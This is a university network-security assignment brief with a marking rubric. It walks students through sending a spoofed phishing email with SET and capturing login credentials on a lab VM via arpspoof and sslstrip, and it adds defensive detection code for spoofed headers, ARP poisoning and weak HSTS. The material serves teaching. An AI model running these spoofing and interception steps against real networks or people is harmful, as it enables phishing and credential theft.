NTW600 Assignment 3 S3-2023

Assessment 3: Information and Rubric

Subject Code: NTW 600
Subject Name: Computer Network and Security
Assessment Number and Title: Assessment 3: Generation of Mass Mailer Attacks, Stripping and Spoofing by Using Kali Linux
Assessment Type: Individual Assessment
Length / Duration: 2000 +/-10% words
Weighting %: 30%
Total Marks: 100
Submission: Online Submission
Due Date: Week-11 (Sunday at 23:59)
Mode: Face-to-Face, Individual
Format: a) Report; b) In-Class Presentations Plus Viva

Assessment Description and Instructions

There are two major tasks that students are supposed to perform in this assessment.
1- Social engineering attacks - Mass Mailer Attack
2- SSL Stripping and ARP Spoofing in Kali Linux

Part-1 Social engineering attacks - Mass Mailer Attack

Social engineering attacks are among the top techniques used against networks today. Why spend days,
weeks, or even months trying to penetrate layers of network security when we can just trick a user into
running a file that gives us full access to their machine and bypasses antivirus, firewalls, and many
intrusion detection systems? This is most commonly seen in phishing attacks today: craft an e-mail or
create a fake website that tricks a user into running a malicious file that creates a backdoor into their
system.
In this assessment students will use Kali Linux, which includes one of the most popular social engineering
attack toolkits available, David Kennedy's Social Engineering Toolkit (SET). More recently, several
non-social-engineering tools have also been added to SET, making it a very robust attack tool.
Follow the steps below to generate a mailer attack.

Step-1 Installation of Kali Linux:


Kali Linux is a popular operating system used for penetration testing and ethical hacking. While Kali
Linux is primarily designed to be installed on its own dedicated hardware or as a virtual machine, there
are ways to install it on Windows and macOS. Here are the general steps for installing Kali Linux on
both operating systems:
Installation on Windows:
1. Download the Kali Linux installer for Windows from the official Kali Linux website.
2. Run the installer executable file and follow the on-screen instructions.
3. Choose the installation location and other options as per your preference.
4. Once the installation is complete, you can launch Kali Linux from the Start menu or desktop
shortcut.
Installation on macOS:
1. Download the Kali Linux ISO image for macOS from the official Kali Linux website.
2. Install a virtualization software like VirtualBox or VMware Fusion on your macOS.
3. Open the virtualization software and create a new virtual machine.
4. Configure the virtual machine settings, including allocating system resources and attaching the
Kali Linux ISO image as the bootable media.
5. Start the virtual machine and follow the Kali Linux installation process within the virtualized
environment.
6. Once the installation is complete, you can access Kali Linux by running the virtual machine
and launching the operating system.
It's important to note that Kali Linux is a powerful tool and should be used responsibly and legally.
Ensure you have a valid use case and adhere to the applicable laws and regulations when using Kali
Linux. Additionally, make sure to keep your Kali Linux installation updated with the latest security
patches and updates to maintain its effectiveness and security.

After the successful installation, students are required to follow the steps outlined below.

Step-2 Type the following command in a terminal:

setoolkit

The screenshot is as follows:

Social-Engineering Attacks is at the top of the menu, so we choose number 1 and hit Enter. SET then
displays the social engineering options, as shown in the following screenshot:
In this lab we choose option 5, the Mass Mailer Attack.
Step-3
One way a social engineer will attack a network is to send out a flood of e-mails to company addresses
and see who will respond or run the malicious attachment sent with them.

After entering option 5 in SET we get two options:

1. E-mail Attack single E-mail Address


2. E-mail Attack Mass Mailer
The screenshot is as follows:

For this example let's just send one. We press 1 and hit "Enter".
Step-4
Then we enter a target e-mail address. See the following screenshot

Now we select option 1 to use a Gmail account or another server. For this lab we will use a fake
Gmail account. The Gmail address and password must be correct.
Then we choose a spoofed name to use for the 'from' line of the message. Let's use
"[email protected]" so it looks like it's from Google. Pay special attention to this field, as this
is where the real social engineering takes place.
Now SET asks for the password of the Gmail account.

Then we press yes at the prompt "Flag this message/s as high priority ?"

We don't want to attach any malicious file, so we choose "no" when prompted "Do you want to attach a
file ?"

Next, enter an e-mail subject line. What about "Important update"?


Enter "p" when prompted to "Send the message as html or plain ?"

Now type in a fake message, preferably one that will entice our victim to click on an included
malicious link or to surf to a malicious web page.

In actual defense practice this could just be a test webpage that records the IP address of those who
were tricked to surf to the page. That way as a security expert we know who in our organization needs
to be better educated on the risks of malicious e-mails.

When finished, we type "END" on the last line, as in the following screenshot.
Then press "Enter" and SET will send the e-mail to the victim.

The message in the above screenshot is obviously a silly fake, but something like this (with a much more
believable message) could be used to test employees' ability to detect, resist and report phishing
attempts.

So far we have just sent a fake e-mail that could redirect someone to a bogus site. But if we could
make a fake site that offered up a booby script, and if the user allows the script to create shell with the
user.

*Note that some SMTP servers may require authentication, and you'll need to provide valid
credentials for successful delivery.
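
Seen from the receiving side, the spoofed 'from' line set in Step-4 leaves traces that a mail filter or analyst can check in the message headers. The following is an added example, not part of the assignment or of SET; every address, domain and header value in it is constructed, and `build_sample` and `spoof_findings` are hypothetical helper names.

```python
import re
from email import message_from_string
from email.utils import parseaddr

ADDR_IN_TEXT = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")
AUTH_VERDICT = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.I)

def build_sample(from_line, return_path, auth):
    """Constructed test message; every address and domain here is made up."""
    return (f"Return-Path: <{return_path}>\n"
            f"Authentication-Results: mx.corp.example; {auth}\n"
            f"From: {from_line}\n"
            "To: staff@corp.example\n"
            "Subject: Important update\n\n"
            "Please read the update.\n")

def domain_of(address):
    """Lower-cased domain part of an address, or '' when there is none."""
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""

def spoof_findings(raw_message):
    """Return the reasons the visible From line should not be trusted."""
    msg = message_from_string(raw_message)
    display, from_addr = parseaddr(msg.get("From", ""))
    from_dom = domain_of(from_addr)
    findings = []
    # 1. Display name dressed up as an address in a different domain.
    shown = ADDR_IN_TEXT.search(display)
    if shown and shown.group(1).lower() != from_dom:
        findings.append(f"display name shows {shown.group(0)}, mailbox is {from_addr}")
    # 2. Envelope sender not aligned with the From domain (strict comparison;
    #    DMARC's relaxed mode compares organizational domains instead).
    env_dom = domain_of(parseaddr(msg.get("Return-Path", ""))[1])
    if env_dom and env_dom != from_dom:
        findings.append(f"Return-Path domain {env_dom} != From domain {from_dom}")
    # 3. Receiver-recorded SPF/DKIM/DMARC verdicts other than 'pass'.
    verdicts = {k.lower(): v.lower() for k, v in
                AUTH_VERDICT.findall(msg.get("Authentication-Results", ""))}
    for method in ("spf", "dkim", "dmarc"):
        if verdicts.get(method, "none") != "pass":
            findings.append(f"{method}={verdicts.get(method, 'none')}")
    return findings

PASS_ALL = "spf=pass smtp.mailfrom=mail.example; dkim=pass header.d=mail.example; dmarc=pass"
# Display-name trick: a real webmail account with a forged visible name.
NAME_SPOOF = build_sample('"security@brand.example" <lab.account@mail.example>',
                          "lab.account@mail.example", PASS_ALL)
# Forged From domain relayed through an unrelated server.
DOMAIN_SPOOF = build_sample("IT Helpdesk <helpdesk@corp.example>",
                            "bounce@mailer.example", "spf=pass; dkim=none; dmarc=fail")
CLEAN = build_sample("IT Helpdesk <helpdesk@mail.example>",
                     "helpdesk@mail.example", PASS_ALL)

if __name__ == "__main__":
    for label, raw in (("name", NAME_SPOOF), ("domain", DOMAIN_SPOOF), ("clean", CLEAN)):
        print(label, spoof_findings(raw))
```

The first sample passes SPF, DKIM and DMARC because it really was sent from the webmail account, which is why the display-name check is needed in addition to the authentication verdicts.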

Final Outcomes and submission:

Students are expected to follow all the steps to generate a fake email during the lab work activity in
week 6. The final online submission on Moodle is a file containing the complete step-by-step procedure
with screenshots of the work.

Part-2 SSL Stripping and ARP Spoofing in Kali Linux

SSL Stripping and ARP Spoofing are two common techniques used in network security attacks.
They are often employed by attackers to intercept and manipulate network traffic, particularly
in scenarios where Secure Sockets Layer (SSL) encryption is used for secure communication.
SSL Stripping: SSL Stripping is an attack method that aims to downgrade a secure HTTPS
connection to an insecure HTTP connection, making the traffic susceptible to interception and
manipulation. The attacker typically acts as a Man-in-the-Middle (MitM) by intercepting the
communication between the client and the server. The attack involves the following steps:
a. The attacker sets up a rogue access point or performs DNS spoofing to redirect the victim's
traffic through their own device.
b. The attacker intercepts the initial HTTPS request from the victim and responds with a
modified HTTP response instead of the expected HTTPS response.
c. The attacker then establishes an HTTPS connection with the server on behalf of the victim,
making the victim unaware of the downgrade.
d. Throughout the communication, the attacker intercepts and relays the traffic between the
client and the server, potentially capturing sensitive information.
Kali Linux, being a powerful penetration testing and security auditing platform, can be used to
perform SSL stripping attacks. Tools like "sslstrip" and "Bettercap" are commonly used in Kali
Linux for this purpose.

ARP Spoofing: ARP (Address Resolution Protocol) Spoofing, also known as ARP Poisoning,
is an attack technique used to manipulate the ARP table in a local network. The attack allows
the attacker to redirect network traffic meant for a specific IP address to their own device. The
steps involved in an ARP Spoofing attack are as follows:
a. The attacker sends falsified ARP messages to the target network, associating their own MAC
address with the IP address of another device on the network, such as the default gateway or a
specific target.
b. As a result, the target network starts sending its traffic to the attacker's device, believing it
to be the legitimate destination.
c. The attacker can then intercept and manipulate the traffic as desired, potentially capturing
sensitive data or launching further attacks.

In Kali Linux, various tools like "Ettercap" and "arpspoof" are available for performing ARP
Spoofing attacks. These tools allow the attacker to sniff network traffic, intercept packets, and
manipulate them.
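
The falsified ARP messages described above show up in the neighbour table of any host on the segment: an IP address whose MAC changes, and one MAC answering for several IPs. The check below is an added example, not part of the assignment; it compares a trusted snapshot of `arp -a` (Windows) or `ip neigh` (Linux) output with a later one. The 10.0.2.x addresses follow the lab network used in the steps further down, and the MAC addresses are constructed.

```python
import re
from collections import defaultdict

# An IPv4 address followed later on the line by a MAC written with ':' or '-'.
ENTRY = re.compile(
    r"\b(\d{1,3}(?:\.\d{1,3}){3})\b.*?\b((?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2})\b", re.I)

def parse_neighbors(text):
    """Map IP -> MAC from `arp -a` (Windows) or `ip neigh` (Linux) output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.search(line)
        if not m:
            continue  # headers and entries without a resolved MAC
        mac = m.group(2).lower().replace("-", ":")
        if int(mac[:2], 16) & 1:
            continue  # broadcast/multicast MACs are shared by design
        table[m.group(1)] = mac
    return table

def arp_findings(baseline, current):
    """Compare a trusted baseline table with the current one."""
    findings = []
    for ip in sorted(current):
        old, new = baseline.get(ip), current[ip]
        if old and old != new:
            findings.append(("changed", ip, old, new))
    owners = defaultdict(list)
    for ip, mac in current.items():
        owners[mac].append(ip)
    for mac in sorted(owners):
        if len(owners[mac]) > 1:
            findings.append(("shared", mac, tuple(sorted(owners[mac]))))
    return findings

# Constructed `arp -a` snapshots as seen on the Windows VM (10.0.2.5).
BASELINE = """\
Interface: 10.0.2.5 --- 0x4
  Internet Address      Physical Address      Type
  10.0.2.1              52-54-00-12-35-00     dynamic
  10.0.2.4              08-00-27-aa-bb-04     dynamic
"""
CURRENT = """\
Interface: 10.0.2.5 --- 0x4
  Internet Address      Physical Address      Type
  10.0.2.1              08-00-27-aa-bb-04     dynamic
  10.0.2.4              08-00-27-aa-bb-04     dynamic
  10.0.2.255            ff-ff-ff-ff-ff-ff     static
"""

if __name__ == "__main__":
    for finding in arp_findings(parse_neighbors(BASELINE), parse_neighbors(CURRENT)):
        print(finding)
```

A gateway entry that appears in a "changed" finding and whose new MAC also appears in a "shared" finding is the pattern to alert on.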

Structure Diagram:

To understand this better, see the diagram below:


There are mainly 4 steps in this type of attack:
1. The victim sends a request to the server over HTTPS, but because the attacker has spoofed the
network with arpspoof, the HTTPS request passes through the attacker's machine.
2. After hijacking the HTTPS request, the attacker sends the same HTTPS request on to
the server, because many modern servers respond only in HTTPS mode.
3. When the server responds in HTTPS encrypted format, the attacker changes the response from
HTTPS, which is a secure connection, to HTTP.
4. The attacker answers the victim's request in the form of HTTP and works as a
man-in-the-middle.

These types of attacks can be carried out on public networks. A malicious user can also set up their
own Wi-Fi network and, when anyone connects to it, perform credential theft attacks on bank accounts
or any other malicious activity.

In this assessment students will use Kali Linux, which includes one of the popular social
engineering attack toolkits available, by following the steps below.

SSL Stripping and ARP Spoofing Usage


Following are steps for performing SSL Stripping and ARP Spoofing in Kali Linux:
Step 1: Open the Kali Linux terminal in root mode.
Step 2: Type the following command in the terminal and hit enter to install sslstrip:
$ apt install sslstrip

Installation of sslstrip in our Kali Linux is done successfully.

Step 3: Type the following command in the terminal and hit enter to install dsniff:
$ apt install dsniff

Installation of dsniff in our Kali Linux is done successfully.


Step 4: Type the following command in the terminal and hit enter for finding out the name of
the interface of the network.
$ ifconfig
This will show which interface we are using. In our case interface is eth0 and IP is 10.0.2.4
Step 5: Execute the following command in the terminal and hit enter to enable IP forwarding:

$ echo '1' > /proc/sys/net/ipv4/ip_forward

This makes our Kali machine forward packets like a router.

Step 6: Type the following command in the terminal and hit enter for IP table configuration:

$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080


This adds a rule to the NAT table that redirects TCP traffic with destination port 80 to port 8080.

Step 7: Type the following command in the terminal and hit enter to find the gateway IP
of our router.
$ route -n

This will show our gateway IP address. In our case the gateway IP is 10.0.2.1.

Step 8: Type the following command in the terminal and hit enter to find targets in the network:
$ nmap -sS -O <gateway ip>/24
In our case the gateway IP is 10.0.2.1, so we will use this gateway IP for our task:
$ nmap -sS -O 10.0.2.1/24
This will scan and show all the IPs on the router's network, and based on the scan result we can
identify our target. In our case, we want to attack the second VM, which runs Windows, so we will
open the Windows VM.
Step 9: Open up the command prompt of VM Windows and type ipconfig and hit enter:
$ ipconfig
This will show our VM Windows IP as well as the gateway. Here we can also verify our
gateway IP address.
In our case, VM Windows IP is 10.0.2.5

Step 10: Now open up a new terminal with root access in Kali Linux, type the following
command and hit enter. This will start the arpspoof of our target machine.
$ arpspoof -i <interface> -t <target IP> -r <gateway IP>
In our case that is:
$ arpspoof -i eth0 -t 10.0.2.5 -r 10.0.2.1
Now the ARP spoofing is started.
Step 11: Without closing the arpspoof terminal open up a new terminal with root access and
type the following command in the terminal and hit enter:
$ sslstrip -l 8080

This will start SSL stripping on the VM Windows Targeted machine.

Step 12: Now open up the browser on the targeted Windows machine and type any web page name. In our
case we type https://instagram.com. It will go to the login page of Instagram, and we are
going to enter random data and click the login button.
This data will be captured in the sslstrip.log file in our Kali Linux system.

Step 13: Now open up a new terminal in Kali Linux with root access and type the following
command in the terminal and hit enter.

$ cat sslstrip.log

This will show the captured data. In this way, we can perform SSL Stripping and ARP Spoofing
in our Kali Linux system.
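
The downgrade in Steps 11 to 13 works only while the browser is willing to speak plain HTTP to the site. The check below is an added example, not part of the assignment; it parses the Strict-Transport-Security response header (RFC 6797), the server-side control that tells browsers to refuse that downgrade, and rates how durable the policy is. The host names and header values are constructed, and the one-year threshold and the rating labels are assumptions.

```python
import re

ONE_YEAR = 31536000  # assumed minimum max-age for a durable policy

def parse_hsts(value):
    """Parse a Strict-Transport-Security value (RFC 6797); None if invalid."""
    seen = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        name = name.strip().lower()
        if not name:
            continue                      # tolerate empty directives (";;")
        if name in seen:
            return None                   # repeated directive: header is ignored
        seen[name] = val.strip().strip('"')
    if not re.fullmatch(r"[0-9]+", seen.get("max-age", "")):
        return None                       # max-age is mandatory and numeric
    return {"max_age": int(seen["max-age"]),
            "include_subdomains": "includesubdomains" in seen,
            "preload": "preload" in seen}

def downgrade_exposure(https_response_headers):
    """Rate how long a browser will keep refusing plain HTTP for this site."""
    raw = next((v for k, v in https_response_headers.items()
                if k.lower() == "strict-transport-security"), None)
    policy = parse_hsts(raw) if raw is not None else None
    if policy is None or policy["max_age"] == 0:
        return "exposed"        # browser keeps no HTTPS-only memory of the site
    if policy["max_age"] < ONE_YEAR:
        return "short-lived"    # protection lapses soon after the last visit
    if policy["include_subdomains"] and policy["preload"]:
        return "preload-ready"  # meets the header conditions for preload lists
    return "after-first-visit"  # the very first visit can still be downgraded

# Constructed response headers, as received over HTTPS from made-up sites.
SAMPLES = {
    "no-header.example": {"Content-Type": "text/html"},
    "short.example": {"Strict-Transport-Security": "max-age=300"},
    "pinned.example": {"strict-transport-security": "max-age=63072000"},
    "full.example": {"Strict-Transport-Security":
                     'max-age="31536000"; includeSubDomains; preload'},
    "broken.example": {"Strict-Transport-Security": "max-age=600; max-age=31536000"},
}

def audit(samples=SAMPLES):
    """Return {host: rating} for every sample response."""
    return {host: downgrade_exposure(headers) for host, headers in samples.items()}

if __name__ == "__main__":
    for host, rating in audit().items():
        print(f"{host:20} {rating}")
```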

Presentations on Case Study Questions: 10 Marks

Structure of the Report (75 Marks)

Title: Case Study Report: Software Development Process and Budget Control System

1. Introduction (10 Marks)

• Briefly introduce the Social engineering attacks - Mass Mailer Attack, SSL Stripping and ARP
Spoofing in Kali Linux

• Provide relevant background information.

• Explain the purpose of the report and the importance of addressing the
provided questions.

2. Analysis and Technical Findings

• Part-1 (25)

• Perform practically all the steps mentioned in “Part-1 Social engineering attacks - Mass Mailer
Attack” in your systems (laptops), take a screenshot of your Kali results with each step.

• Part-2 (25)

• Perform practically all the steps mentioned in “Part-2 SSL Stripping and
ARP Spoofing in Kali Linux” in your systems (laptops), take a screenshot
of your Kali results with each step.

• Write down your findings if you successfully conducted a Mass Mailer attack, Stripping and
Spoofing.

3. Solutions to prevent from these attacks (10)

• What are the potential solutions to prevent spam, mailer attacks or spoofing, how to secure
your systems from further attacks.

4. Conclusion (5)

• Summarize the main points and outcomes of this technical report.

• Reiterate the significance of the topic and the relevance of the contents.

• Offer final thoughts or reflections on the cyber attacks and its implications.

5. References

• Include a list of all the sources cited in the report, following a consistent
citation style (IEEE referencing style).

6. Appendices (optional)

• Include any supplementary materials, such as additional data, charts, graphs, or supporting
documents.

In class Demonstration (25)

Each student is required to present their work in front of the class during week 11.
This presentation should involve a demonstration of your technical work using Kali
Linux on your system. Your presentation will be conducted during the
class, followed by a technical viva on your project. The following week, week 12,
marks the submission deadline for your report. Failure to present your work as
scheduled could result in a failing grade for the entire assessment.

Submission Details
• This is an individual assessment.
• You must submit your report in a Word or PDF PIA format on the Turnitin link
available on Moodle.
• The assessment carries 30% weightage and is marked out of 100.
• Your similarity index should be less than 20%. However, if the plagiarism
percentage exceeds 25%, your assessment will undergo a thorough
investigation, and it may result in a deduction of marks or even a failing grade.
NTW600 Assessment # 3 Marking Rubric: Generation of Mass Mailer Attacks, Striping and Spoofing by
Using Kali Linux

Grade bands: F (Fail) 0-49%; P (Pass) 50-64%; C (Credit) 65-74%; D (Distinction) 75-84%; HD (High Distinction) 85-100%

Introduction/ Overview of the topics (10)
F (Fail): Unsatisfactorily or unclearly conveys the topic of the technical report. This is not relevant to the assignment topic. Completely unable to introduce Mass Mailer Attack, ARP spoofing and stripping.
P (Pass): Fairly conveys the report topic. Some relevance and briefly presented. Poor introduction of the assignment topic. Poorly introduce Mass Mailer Attack, ARP spoofing and stripping.
C (Credit): Accurately conveys the report topic. Some relevance and briefly presented. Poor introduction of the assignment topic. Poorly introduce Mass Mailer Attack, ARP spoofing and stripping.
D (Distinction): Accurately conveys the project topic, methods. Generally relevant and analysed. Good analysis of the case study of conveys the report topic. Accurately introduce Mass Mailer Attack, ARP spoofing and stripping.
HD (High Distinction): Accurately Plus concisely conveys the project topic, methods. Generally relevant and analysed. Good analysis of the case study of conveys the report topic. Accurately introduce Mass Mailer Attack, ARP spoofing and stripping. Excellent overview of the case study or accurately provided a background of the study.

Analysis and Technical Findings: Part-1 Social engineering attacks - Mass Mailer Attack; Part-2 SSL Stripping and ARP Spoofing in Kali Linux (50 = 25+25)
F (Fail): Unable to install Kali Linux, unable to conduct any kind of Mass Mailer Attack, stripping, or ARP spoofing attacks. No outcomes from the Kali are presented.
P (Pass): Poorly presented the technical stuff. Able to install Kali Linux, partially conducted any kind of Mass Mailer Attack, stripping, or ARP spoofing attacks. Outcomes are not completely described/ Missed more than half steps of the task-1 and task-2.
C (Credit): Accurately presented the technical stuff. Able to install Kali Linux, partially conducted any kind of Mass Mailer Attack, stripping, or ARP spoofing attacks. Outcomes are not completely described/ Missed few steps from each part of the assessment.
D (Distinction): Successfully performed the complete activity, presented the technical stuff. Able to install Kali Linux, Conducted Mass Mailer Attack, stripping, or ARP spoofing attacks. Outcomes are completely described/ all the steps from each part of the assessment has been finalised.
HD (High Distinction): Excellently performed the complete activity, presented the technical stuff. install Kali Linux, Conducted Mass Mailer Attack, stripping, or ARP spoofing attacks. Outcomes are completely described/ all the steps from each part of the assessment has been finalised. Fabulously presented the analysis of the outcomes.

Solutions/ Conclusion/referencing (15)
F (Fail): Argument is confused and disjointed in recommendations. Lacks consistency with many errors. Weak Conclusion
P (Pass): Adequate cohesion and conviction in recommendations. Sometimes clear referencing style. Weak Conclusion
C (Credit): Mostly consistent logical and convincing. Generally good referencing style. Well augmented conclusion
D (Distinction): Consistency logical and convincing. Clear referencing style. Clear Conclusion
HD (High Distinction): Logic is clear and easy to follow with strong arguments. Solutions to the problem are accurate. Clear styles with excellent source of references. Concrete conclusion

Demonstrations: In-class Presentations (25)
F (Fail): Demonstration is confused and disjointed. Lack of knowledge about the design, implementation, and development process
P (Pass): Adequate cohesion and conviction. show a poor knowledge about the design, implementation, and development process
C (Credit): Mostly consistent logical and convincing. show a limited knowledge about the design implementation, and development process
D (Distinction): Consistency logical and convincing. show a good knowledge about the design implementation, and development process
HD (High Distinction): Logic is clear and easy to follow with strong arguments. show a strong knowledge about the design implementation, and development process